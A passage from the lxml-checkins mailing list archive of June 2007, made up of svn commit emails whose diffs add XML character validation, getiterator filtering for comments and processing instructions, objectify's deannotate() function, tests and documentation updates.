invalid! s = s + 1 - return 0 # plain 7-bit ASCII + return is_non_ascii cdef object funicode(char* s): cdef Py_ssize_t slen @@ -602,12 +609,15 @@ cdef object _utf8(object s): if python.PyString_Check(s): assert not isutf8py(s), \ - "All strings must be Unicode or ASCII" - return s + "All strings must be XML compatible, either Unicode or ASCII" elif python.PyUnicode_Check(s): - return python.PyUnicode_AsUTF8String(s) + # FIXME: we should test these strings, too ... + s = python.PyUnicode_AsUTF8String(s) + assert isutf8py(s) != -1, \ + "All strings must be XML compatible, either Unicode or ASCII" else: raise TypeError, "Argument must be string or unicode." + return s cdef object _encodeFilename(object filename): if filename is None: Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 19:46:15 2007 @@ -480,7 +480,7 @@ else: c_node = _findChild(self._c_node, start) # now delete the slice - if start != stop: + if c_node is not NULL and start != stop: c_node = _deleteSlice(c_node, start, stop) # if the insertion point is at the end, append there if c_node is NULL: @@ -591,8 +591,8 @@ while c_node is not NULL: c_node_next = c_node.next if _isElement(c_node): - _removeText(c_node_next) - c_node_next = c_node.next + while c_node_next is not NULL and not _isElement(c_node_next): + c_node_next = c_node_next.next _removeNode(c_node) c_node = c_node_next Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py Tue Jun 12 19:46:15 2007 @@ -1151,6 +1151,26 @@ self.assertXML('', b) self.assertXML('', c) + def test_delslice_tail(self): + XML = self.etree.XML + a = XML('B2C2') + b, c = a + + del a[:] + + self.assertEquals("B2", b.tail) + self.assertEquals("C2", c.tail) + + def test_replace_slice_tail(self): + XML = self.etree.XML + a = XML('B2C2') + b, c = a + + a[:] = [] + + self.assertEquals("B2", b.tail) + self.assertEquals("C2", c.tail) + def test_delitem_tail(self): ElementTree = self.etree.ElementTree f = StringIO('B2C2') Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Tue Jun 12 19:46:15 2007 @@ -1388,6 +1388,41 @@ self.assertRaises(AssertionError, Element, 'ha\0ho') + def test_unicode_byte_zero(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", u'ha\0ho') + self.assertRaises(AssertionError, setattr, a, "tail", u'ha\0ho') + + self.assertRaises(AssertionError, Element, u'ha\0ho') + + def test_byte_invalid(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", 'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "text", 'ha\x02ho') + + self.assertRaises(AssertionError, setattr, a, "tail", 'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "tail", 'ha\x02ho') + + self.assertRaises(AssertionError, Element, 'ha\x07ho') + self.assertRaises(AssertionError, Element, 'ha\x02ho') + + def test_unicode_byte_invalid(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", u'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "text", u'ha\x02ho') + + self.assertRaises(AssertionError, setattr, a, "tail", u'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "tail", u'ha\x02ho') + + self.assertRaises(AssertionError, Element, u'ha\x07ho') + self.assertRaises(AssertionError, Element, u'ha\x02ho') + def test_encoding_tostring_utf16(self): # ElementTree fails to serialize this tostring = self.etree.tostring Modified: lxml/branch/lxml-1.3/src/lxml/tree.pxd ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tree.pxd (original) +++ lxml/branch/lxml-1.3/src/lxml/tree.pxd Tue Jun 12 19:46:15 2007 @@ -41,6 +41,9 @@ cdef xmlCharEncoding xmlDetectCharEncoding(char* text, int len) cdef char* xmlGetCharEncodingName(xmlCharEncoding enc) +cdef extern from "libxml/chvalid.h": + cdef int xmlIsChar_ch(char c) + cdef extern from "libxml/hash.h": ctypedef struct xmlHashTable ctypedef void xmlHashScanner(void* payload, void* data, char* name) From scoder at codespeak.net Tue Jun 12 19:51:41 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:51:41 +0200 (CEST) Subject: [Lxml-checkins] r44200 - lxml/trunk Message-ID: <20070612175141.EDE5981A5@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:51:41 2007 New Revision: 44200 Modified: lxml/trunk/version.txt Log: bump the trunk version 2.0dev Modified: lxml/trunk/version.txt ============================================================================== --- lxml/trunk/version.txt (original) +++ lxml/trunk/version.txt Tue Jun 12 19:51:41 2007 @@ -1 +1 @@ -1.3beta +2.0dev From scoder at codespeak.net Tue Jun 12 19:51:56 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:51:56 +0200 (CEST) Subject: [Lxml-checkins] r44201 - lxml/branch/lxml-1.3 Message-ID: <20070612175156.71DB181A5@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:51:56 2007 New Revision: 44201 Modified: lxml/branch/lxml-1.3/version.txt Log: bump the branch version 1.3 Modified: lxml/branch/lxml-1.3/version.txt ============================================================================== --- lxml/branch/lxml-1.3/version.txt (original) +++ lxml/branch/lxml-1.3/version.txt Tue Jun 12 19:51:56 2007 @@ -1 +1 @@ -1.3beta +1.3 From scoder at codespeak.net Tue Jun 12 21:13:14 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 21:13:14 +0200 (CEST) Subject: [Lxml-checkins] r44202 - lxml/branch/lxml-1.3 Message-ID: <20070612191314.25DE18184@code0.codespeak.net> Author: scoder Date: Tue Jun 12 21:13:12 2007 New Revision: 44202 Modified: lxml/branch/lxml-1.3/setup.py Log: require setuptools 0.6c6 Modified: lxml/branch/lxml-1.3/setup.py ============================================================================== --- lxml/branch/lxml-1.3/setup.py (original) +++ lxml/branch/lxml-1.3/setup.py Tue Jun 12 21:13:12 2007 @@ -1,5 +1,5 @@ from ez_setup import use_setuptools -use_setuptools(version="0.5") +use_setuptools(version="0.6c6") from setuptools import setup import sys, os From scoder at codespeak.net Tue Jun 12 21:13:22 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 21:13:22 +0200 (CEST) Subject: [Lxml-checkins] r44203 - lxml/trunk Message-ID: <20070612191322.3E7CF8198@code0.codespeak.net> Author: scoder Date: Tue Jun 12 21:13:21 2007 New Revision: 44203 Modified: lxml/trunk/setup.py Log: require setuptools 0.6c6 Modified: lxml/trunk/setup.py ============================================================================== --- lxml/trunk/setup.py (original) +++ lxml/trunk/setup.py Tue Jun 12 21:13:21 2007 @@ -1,5 +1,5 @@ from ez_setup import use_setuptools -use_setuptools(version="0.5") +use_setuptools(version="0.6c6") from setuptools import setup import sys, os From scoder at codespeak.net Tue Jun 12 21:39:45 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 21:39:45 +0200 (CEST) Subject: [Lxml-checkins] r44205 - lxml/branch/lxml-1.3 Message-ID: <20070612193945.503BF8197@code0.codespeak.net> Author: scoder Date: Tue Jun 12 21:39:45 2007 New Revision: 44205 Modified: lxml/branch/lxml-1.3/setup.py Log: setuptools version: 0.6c5 is enough Modified: lxml/branch/lxml-1.3/setup.py ============================================================================== --- lxml/branch/lxml-1.3/setup.py (original) +++ lxml/branch/lxml-1.3/setup.py Tue Jun 12 21:39:45 2007 @@ -1,5 +1,5 @@ from ez_setup import use_setuptools -use_setuptools(version="0.6c6") +use_setuptools(version="0.6c5") from setuptools import setup import sys, os From scoder at codespeak.net Tue Jun 12 21:39:52 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 21:39:52 +0200 (CEST) Subject: [Lxml-checkins] r44206 - lxml/trunk Message-ID: <20070612193952.C9B36819A@code0.codespeak.net> Author: scoder Date: Tue Jun 12 21:39:52 2007 New Revision: 44206 Modified: lxml/trunk/setup.py Log: setuptools version: 0.6c5 is enough Modified: lxml/trunk/setup.py ============================================================================== --- lxml/trunk/setup.py (original) +++ lxml/trunk/setup.py Tue Jun 12 21:39:52 2007 @@ -1,5 +1,5 @@ from ez_setup import use_setuptools -use_setuptools(version="0.6c6") +use_setuptools(version="0.6c5") from setuptools import setup import sys, os From scoder at codespeak.net Tue Jun 12 22:18:08 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 22:18:08 +0200 (CEST) Subject: [Lxml-checkins] r44207 - in lxml/branch/lxml-1.3: . src/lxml src/lxml/tests Message-ID: <20070612201808.346068193@code0.codespeak.net> Author: scoder Date: Tue Jun 12 22:18:06 2007 New Revision: 44207 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py Log: support Comment and ProcessingInstruction elements in el.getiterator() Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Tue Jun 12 22:18:06 2007 @@ -25,6 +25,9 @@ * Replacing the children slice of an Element would cut off the tails of the original children +* ``Element.getiterator(tag)`` did not accept ``Comment`` and + ``ProcessingInstruction`` as tags + * API functions now check incoming strings for XML conformity. Zero bytes or low ASCII characters are no longer accepted. Modified: lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi Tue Jun 12 22:18:06 2007 @@ -436,6 +436,9 @@ * its name string equals the c_name string """ cdef char* c_node_href + if c_node.type != tree.XML_ELEMENT_NODE: + # not an element, only succeed if we match everything + return c_name is NULL and c_href is NULL if c_name is NULL: if c_href is NULL: # always match Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 22:18:06 2007 @@ -1596,17 +1596,22 @@ cdef public class _ElementTagMatcher [ object LxmlElementTagMatcher, type LxmlElementTagMatcherType ]: cdef object _pystrings + cdef int _node_type cdef char* _href cdef char* _name cdef _initTagMatch(self, tag): + self._href = NULL + self._name = NULL if tag is None: - self._href = NULL - self._name = NULL + self._node_type = 0 + elif tag is Comment: + self._node_type = tree.XML_COMMENT_NODE + elif tag is ProcessingInstruction: + self._node_type = tree.XML_PI_NODE else: + self._node_type = tree.XML_ELEMENT_NODE self._pystrings = _getNsTag(tag) - if self._pystrings[0] is None: - self._href = NULL - else: + if self._pystrings[0] is not None: self._href = _cstr(self._pystrings[0]) self._name = _cstr(self._pystrings[1]) if self._name[0] == c'*' and self._name[1] == c'\0': @@ -1624,7 +1629,9 @@ cdef xmlNode* c_node c_node = self._next_element(node._c_node) while c_node is not NULL and \ - not _tagMatches(c_node, self._href, self._name): + self._node_type != 0 and \ + (self._node_type != c_node.type or + not _tagMatches(c_node, self._href, self._name)): c_node = self._next_element(c_node) if c_node is NULL: self._node = None @@ -1655,7 +1662,9 @@ self._next_element = _nextElement if tag is not None: while c_node is not NULL and \ - not _tagMatches(c_node, self._href, self._name): + self._node_type != 0 and \ + (self._node_type != c_node.type or + not _tagMatches(c_node, self._href, self._name)): c_node = self._next_element(c_node) if c_node is not NULL: # store Python ref: @@ -1702,9 +1711,11 @@ self._top_node = node self._next_node = node self._initTagMatch(tag) - if tag is not None and \ - not _tagMatches(node._c_node, self._href, self._name) or \ - not inclusive: + if not inclusive or \ + tag is not None and \ + self._node_type != 0 and \ + (self._node_type != node._c_node.type or + not _tagMatches(node._c_node, self._href, self._name)): # this cannot raise StopIteration, self._next_node != None self.next() @@ -1727,7 +1738,8 @@ cdef xmlNode* _nextNodeAnyTag(self, xmlNode* c_node): tree.BEGIN_FOR_EACH_ELEMENT_FROM(self._top_node._c_node, c_node, 0) - return c_node + if self._node_type == 0 or self._node_type == c_node.type: + return c_node tree.END_FOR_EACH_ELEMENT_FROM(c_node) return NULL Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py Tue Jun 12 22:18:06 2007 @@ -1429,6 +1429,56 @@ [a2], list(c.getiterator('a'))) + def test_getiterator_filter_comment(self): + Element = self.etree.Element + Comment = self.etree.Comment + SubElement = self.etree.SubElement + + a = Element('a') + b = SubElement(a, 'b') + comment_b = Comment("TEST-b") + b.append(comment_b) + + self.assertEquals( + [comment_b], + list(a.getiterator(Comment))) + + comment_a = Comment("TEST-a") + a.append(comment_a) + + self.assertEquals( + [comment_b, comment_a], + list(a.getiterator(Comment))) + + self.assertEquals( + [comment_b], + list(b.getiterator(Comment))) + + def test_getiterator_filter_pi(self): + Element = self.etree.Element + PI = self.etree.ProcessingInstruction + SubElement = self.etree.SubElement + + a = Element('a') + b = SubElement(a, 'b') + pi_b = PI("TEST-b") + b.append(pi_b) + + self.assertEquals( + [pi_b], + list(a.getiterator(PI))) + + pi_a = PI("TEST-a") + a.append(pi_a) + + self.assertEquals( + [pi_b, pi_a], + list(a.getiterator(PI))) + + self.assertEquals( + [pi_b], + list(b.getiterator(PI))) + def test_getiterator_with_text(self): Element = self.etree.Element SubElement = self.etree.SubElement From scoder at codespeak.net Tue Jun 12 23:48:23 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 23:48:23 +0200 (CEST) Subject: [Lxml-checkins] r44216 - lxml/trunk/src/lxml/tests Message-ID: <20070612214823.DA8DC81A6@code0.codespeak.net> Author: scoder Date: Tue Jun 12 23:48:23 2007 New Revision: 44216 Modified: lxml/trunk/src/lxml/tests/test_htmlparser.py Log: test refactored to maybe make it work better on different systems Modified: lxml/trunk/src/lxml/tests/test_htmlparser.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_htmlparser.py (original) +++ lxml/trunk/src/lxml/tests/test_htmlparser.py Tue Jun 12 23:48:23 2007 @@ -30,7 +30,7 @@ def test_module_HTML_unicode(self): element = self.etree.HTML(self.uhtml_str) self.assertEqual(unicode(self.etree.tostring(element, 'UTF8'), 'UTF8'), - self.uhtml_str) + unicode(self.uhtml_str.encode('UTF8'), 'UTF8')) def test_module_parse_html_error(self): parser = self.etree.HTMLParser(recover=False) From scoder at codespeak.net Tue Jun 12 23:49:12 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 23:49:12 +0200 (CEST) Subject: [Lxml-checkins] r44217 - lxml/trunk/doc Message-ID: <20070612214912.0805D81B4@code0.codespeak.net> Author: scoder Date: Tue Jun 12 23:49:11 2007 New Revision: 44217 Modified: lxml/trunk/doc/FAQ.txt Log: FAQ: which lib versions to use? Modified: lxml/trunk/doc/FAQ.txt ============================================================================== --- lxml/trunk/doc/FAQ.txt (original) +++ lxml/trunk/doc/FAQ.txt Tue Jun 12 23:49:11 2007 @@ -18,10 +18,11 @@ 1.1 Is there a tutorial? 1.2 Where can I find more documentation about lxml? 1.3 What standards does lxml implement? - 1.4 Where are the Windows binaries? - 1.5 What is the difference between lxml.etree and lxml.objectify? - 1.6 How can I make my application run faster? - 1.7 Why do I get errors about missing UCS4 symbols when installing lxml? + 1.4 Which version of libxml2 and libxslt should I use or require? + 1.5 Where are the Windows binaries? + 1.6 What is the difference between lxml.etree and lxml.objectify? + 1.7 How can I make my application run faster? + 1.8 Why do I get errors about missing UCS4 symbols when installing lxml? 2 Contributing 2.1 Why is lxml not written in Python? 2.2 How can I contribute? @@ -91,6 +92,33 @@ supports loading documents through HTTP and FTP. +Which version of libxml2 and libxslt should I use or require? +------------------------------------------------------------- + +It really depends on your application, but the rule of thumb is: more recent +versions contain less bugs and provide more features. + +* Try to use versions of both libraries that were released together. + +* If you use XML Schema or Schematron which are still under development, the +most recent version of libxml2 is usually a good bet. + +* The same applies to XPath, where a substantial number of bugs and memory +leaks were fixed over time. If you encounter crashes or memory leaks in XPath +applications, try a more recent version of libxml2. + +* For parsing and fixing broken HTML, lxml requires at least libxml2 2.6.21. + +* For the normal tree handling, however, any libxml2 version starting with +2.6.16 should do. + +Read the `release notes of libxml2`_ and the `release notes of libxslt`_ to +see if a specific bug has been fixed. + +.. _`release notes of libxml2`: http://xmlsoft.org/news.html +.. _`release notes of libxslt`: http://xmlsoft.org/XSLT/news.html + + Where are the Windows binaries? ------------------------------- From scoder at codespeak.net Tue Jun 12 23:51:21 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 23:51:21 +0200 (CEST) Subject: [Lxml-checkins] r44218 - lxml/branch/lxml-1.3/doc Message-ID: <20070612215121.9463181B6@code0.codespeak.net> Author: scoder Date: Tue Jun 12 23:51:21 2007 New Revision: 44218 Modified: lxml/branch/lxml-1.3/doc/FAQ.txt Log: FAQ update from trunk Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Tue Jun 12 23:51:21 2007 @@ -13,10 +13,11 @@ 1.1 Is there a tutorial? 1.2 Where can I find more documentation about lxml? 1.3 What standards does lxml implement? - 1.4 Where are the Windows binaries? - 1.5 What is the difference between lxml.etree and lxml.objectify? - 1.6 How can I make my application run faster? - 1.7 Why do I get errors about missing UCS4 symbols when installing lxml? + 1.4 Which version of libxml2 and libxslt should I use or require? + 1.5 Where are the Windows binaries? + 1.6 What is the difference between lxml.etree and lxml.objectify? + 1.7 How can I make my application run faster? + 1.8 Why do I get errors about missing UCS4 symbols when installing lxml? 2 Contributing 2.1 Why is lxml not written in Python? 2.2 How can I contribute? @@ -86,6 +87,33 @@ supports loading documents through HTTP and FTP. +Which version of libxml2 and libxslt should I use or require? +------------------------------------------------------------- + +It really depends on your application, but the rule of thumb is: more recent +versions contain less bugs and provide more features. + +* Try to use versions of both libraries that were released together. + +* If you use XML Schema or Schematron which are still under development, the +most recent version of libxml2 is usually a good bet. + +* The same applies to XPath, where a substantial number of bugs and memory +leaks were fixed over time. If you encounter crashes or memory leaks in XPath +applications, try a more recent version of libxml2. + +* For parsing and fixing broken HTML, lxml requires at least libxml2 2.6.21. + +* For the normal tree handling, however, any libxml2 version starting with +2.6.16 should do. + +Read the `release notes of libxml2`_ and the `release notes of libxslt`_ to +see if a specific bug has been fixed. + +.. _`release notes of libxml2`: http://xmlsoft.org/news.html +.. _`release notes of libxslt`: http://xmlsoft.org/XSLT/news.html + + Where are the Windows binaries? ------------------------------- From scoder at codespeak.net Tue Jun 12 23:51:49 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 23:51:49 +0200 (CEST) Subject: [Lxml-checkins] r44219 - lxml/branch/lxml-1.3/src/lxml/tests Message-ID: <20070612215149.81A3981B6@code0.codespeak.net> Author: scoder Date: Tue Jun 12 23:51:49 2007 New Revision: 44219 Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_htmlparser.py Log: test update from trunk Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_htmlparser.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_htmlparser.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_htmlparser.py Tue Jun 12 23:51:49 2007 @@ -30,7 +30,7 @@ def test_module_HTML_unicode(self): element = self.etree.HTML(self.uhtml_str) self.assertEqual(unicode(self.etree.tostring(element, 'UTF8'), 'UTF8'), - self.uhtml_str) + unicode(self.uhtml_str.encode('UTF8'), 'UTF8')) def test_module_parse_html_error(self): parser = self.etree.HTMLParser(recover=False) From scoder at codespeak.net Wed Jun 13 14:48:23 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 14:48:23 +0200 (CEST) Subject: [Lxml-checkins] r44230 - in lxml/branch/lxml-1.3: . doc src/lxml src/lxml/tests Message-ID: <20070613124823.4F2E881FC@code0.codespeak.net> Author: scoder Date: Wed Jun 13 14:48:21 2007 New Revision: 44230 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/doc/objectify.txt lxml/branch/lxml-1.3/src/lxml/objectify.pyx lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Log: Holger's objectify.deannotate() and some cleanup in objectify.pyx Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Wed Jun 13 14:48:21 2007 @@ -11,6 +11,9 @@ * ``Element.addnext(el)`` and ``Element.addprevious(el)`` methods to support adding processing instructions and comments around the root node +* Extended type annotation in objectify: cleaner annotation namespace setup + plus new ``xsiannotate()`` and ``deannotate()`` functions + * Element.attrib now has a ``pop()`` method * Support for custom Element class instantiation in lxml.sax: passing a Modified: lxml/branch/lxml-1.3/doc/objectify.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/objectify.txt (original) +++ lxml/branch/lxml-1.3/doc/objectify.txt Wed Jun 13 14:48:21 2007 @@ -699,6 +699,34 @@ s = '5' [StringElement] * xsi:type = 'string' +The utility function ``deannotate()`` can be used to get rid of 'py:pytype' +and/or 'xsi:type' information:: + + >>> root = objectify.fromstring('''\ + ... + ... 5 + ... 5 + ... 5 + ... ''') + >>> objectify.annotate(root) + >>> print objectify.dump(root) + root = None [ObjectifiedElement] + d = 5.0 [FloatElement] + * xsi:type = 'double' + * py:pytype = 'float' + l = 5L [LongElement] + * xsi:type = 'long' + * py:pytype = 'long' + s = '5' [StringElement] + * xsi:type = 'string' + * py:pytype = 'str' + >>> objectify.deannotate(root) + >>> print objectify.dump(root) + root = None [ObjectifiedElement] + d = 5 [IntElement] + l = 5 [IntElement] + s = 5 [IntElement] + For convenience, the ``DataElement()`` factory creates an Element with a Python value in one step. You can pass the required Python type name or the XSI type name:: @@ -720,8 +748,8 @@ >>> root.x = objectify.DataElement(5, _xsi="integer") >>> print objectify.dump(root) root = None [ObjectifiedElement] - x = 5 [IntElement] - * py:pytype = 'int' + x = 5L [LongElement] + * py:pytype = 'long' * xsi:type = 'integer' There is a side effect of the type lookup. If you assign a string value using Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/objectify.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/objectify.pyx Wed Jun 13 14:48:21 2007 @@ -707,17 +707,21 @@ """Boolean type base on string values: 'true' or 'false'. """ cdef int _boolval(self) except -1: + cdef char* c_str text = textOf(self._c_node) if text is None: return 0 - text = text.lower() - if text == 'false': - return 0 - elif text == 'true': - return 1 - else: - raise ValueError, "Invalid boolean value: '%s'" % text - + c_str = _cstr(text) + if c_str[0] == c'0' or c_str[0] == c'f' or c_str[0] == c'F': + if c_str[1] == c'\0' or text == "false" or text.lower() == "false": + # '0' or 'f' or 'false' + return 0 + elif c_str[0] == c'1' or c_str[0] == c't' or c_str[0] == c'T': + if c_str[1] == c'\0' or text == "true" or text.lower() == "true": + # '1' or 't' or 'true' + return 1 + raise ValueError, "Invalid boolean value: '%s'" % text + def __nonzero__(self): if self._boolval(): return True @@ -882,13 +886,15 @@ cdef _registerPyTypes(): pytype = PyType('int', int, IntElement) - pytype.xmlSchemaTypes = ("integer", "positiveInteger", "negativeInteger", - "nonNegativeInteger", "nonPositiveInteger", - "int", "unsignedInt", "short", "unsignedShort") + pytype.xmlSchemaTypes = ("int", "short", "byte", "unsignedShort", + "unsignedByte",) + pytype.register() pytype = PyType('long', long, LongElement) - pytype.xmlSchemaTypes = ("long", "unsignedLong") + pytype.xmlSchemaTypes = ("integer", "nonPositiveInteger", "negativeInteger", + "long", "nonNegativeInteger", "unsignedLong", + "unsignedInt", "positiveInteger",) pytype.register() pytype = PyType('float', float, FloatElement) @@ -900,7 +906,9 @@ pytype.register() pytype = PyType('str', None, StringElement) - pytype.xmlSchemaTypes = ("string", "normalizedString") + pytype.xmlSchemaTypes = ("string", "normalizedString", "token", "language", + "Name", "NCName", "ID", "IDREF", "ENTITY", + "NMTOKEN", ) pytype.register() pytype = PyType('none', None, NoneElement) @@ -936,12 +944,25 @@ python.PyList_Append(types, pytype) return types +cdef PyType _guessPyType(value, PyType defaulttype): + if value is None: + return None + for type_check, tested_pytype in _TYPE_CHECKS: + try: + type_check(value) + return tested_pytype + except IGNORABLE_ERRORS: + # could not be parsed as the specififed type => ignore + pass + return defaulttype + cdef object _guessElementClass(tree.xmlNode* c_node): value = textOf(c_node) if value is None: return None if value == '': return StringElement + for type_check, pytype in _TYPE_CHECKS: try: type_check(value) @@ -1424,11 +1445,26 @@ ################################################################################ # Type annotations +cdef PyType _check_type(tree.xmlNode* c_node, PyType pytype): + # StrType does not have a typecheck but is the default anyway, + # so just accept it if given as type information + if pytype is None: + return pytype + value = textOf(c_node) + try: + pytype.type_check(value) + return pytype + except IGNORABLE_ERRORS: + # could not be parsed as the specified type => ignore + pass + return None + + def annotate(element_or_tree, ignore_old=True): """Recursively annotates the elements of an XML tree with 'pytype' attributes. - If the 'ignore_old' keyword argument is True (the default), current + If the 'ignore_old' keyword argument is True (the default), current 'pytype' attributes will be ignored and replaced. Otherwise, they will be checked and only replaced if they no longer fit the current text value. """ @@ -1438,11 +1474,13 @@ cdef tree.xmlNode* c_node cdef tree.xmlNs* c_ns cdef python.PyObject* dict_result + cdef PyType pytype element = cetree.rootNodeOrRaise(element_or_tree) doc = element._doc ignore = bool(ignore_old) - StrType = _PYTYPE_DICT.get('str') + StrType = _PYTYPE_DICT.get('str') + NoneType = _PYTYPE_DICT.get('none') c_node = element._c_node tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) pytype = None @@ -1452,20 +1490,19 @@ old_value = cetree.attributeValueFromNsName( c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) if old_value is not None and old_value != TREE_PYTYPE: - pytype = _PYTYPE_DICT.get(old_value) - if pytype is not None: - value = textOf(c_node) - try: - if not (pytype).type_check(value): - pytype = None - except ValueError: - pytype = None + dict_result = python.PyDict_GetItem(_PYTYPE_DICT, old_value) + if dict_result is not NULL: + pytype = dict_result + if pytype is not StrType: + # StrType does not have a typecheck but is the default anyway, + # so just accept it if given as type information + pytype = _check_type(c_node, pytype) if pytype is None: - # if element is defined as xsi:nil, return NoneElement class + # if element is defined as xsi:nil, represent it as None if cetree.attributeValueFromNsName( c_node, _XML_SCHEMA_INSTANCE_NS, "nil") == "true": - pytype = _PYTYPE_DICT.get("none") + pytype = NoneType if pytype is None: # check for XML Schema type hint @@ -1481,18 +1518,7 @@ # try to guess type if cetree.findChildForwards(c_node, 0) is NULL: # element has no children => data class - if value is None: - value = textOf(c_node) - if value is not None: - for type_check, tested_pytype in _TYPE_CHECKS: - try: - if type_check(value) is not False: - pytype = tested_pytype - break - except ValueError: - pass - else: - pytype = StrType + pytype = _guessPyType(textOf(c_node), StrType) if pytype is None: # delete attribute if it exists @@ -1505,6 +1531,38 @@ _cstr(pytype.name)) tree.END_FOR_EACH_ELEMENT_FROM(c_node) +def deannotate(element_or_tree, pytype=True, xsi=True): + """Recursively de-annotate the elements of an XML tree by removing 'pytype' + and/or 'type' attributes. + + If the 'pytype' keyword argument is True (the default), 'pytype' attributes + will be removed. If the 'xsi' keyword argument is True (the default), + 'xsi:type' attributes will be removed. + """ + cdef _Element element + cdef tree.xmlNode* c_node + + element = cetree.rootNodeOrRaise(element_or_tree) + c_node = element._c_node + if pytype and xsi: + tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) + cetree.delAttributeFromNsName( + c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) + cetree.delAttributeFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "type") + tree.END_FOR_EACH_ELEMENT_FROM(c_node) + elif pytype: + tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) + cetree.delAttributeFromNsName( + c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) + tree.END_FOR_EACH_ELEMENT_FROM(c_node) + else: + tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) + cetree.delAttributeFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "type") + tree.END_FOR_EACH_ELEMENT_FROM(c_node) + + ################################################################################ # Module level parser setup @@ -1549,6 +1607,9 @@ XML = fromstring +cdef object _DEFAULT_NSMAP +_DEFAULT_NSMAP = { "py": PYTYPE_NAMESPACE, "xsi": XML_SCHEMA_INSTANCE_NS } + def Element(_tag, attrib=None, nsmap=None, _pytype=None, **_attributes): """Objectify specific version of the lxml.etree Element() factory that always creates a structural (tree) element. @@ -1561,6 +1622,8 @@ _attributes = attrib if _pytype is None: _pytype = TREE_PYTYPE + if nsmap is None: + nsmap = _DEFAULT_NSMAP _attributes[PYTYPE_ATTRIBUTE] = _pytype return _makeElement(_tag, None, _attributes, nsmap) @@ -1569,11 +1632,10 @@ """Create a new element with a Python value and XML attributes taken from keyword arguments or a dictionary passed as second argument. - Automatically adds a 'pyval' attribute for the Python type of the value, - if the type can be identified. If '_pyval' or '_xsi' are among the + Automatically adds a 'pytype' attribute for the Python type of the value, + if the type can be identified. If '_pytype' or '_xsi' 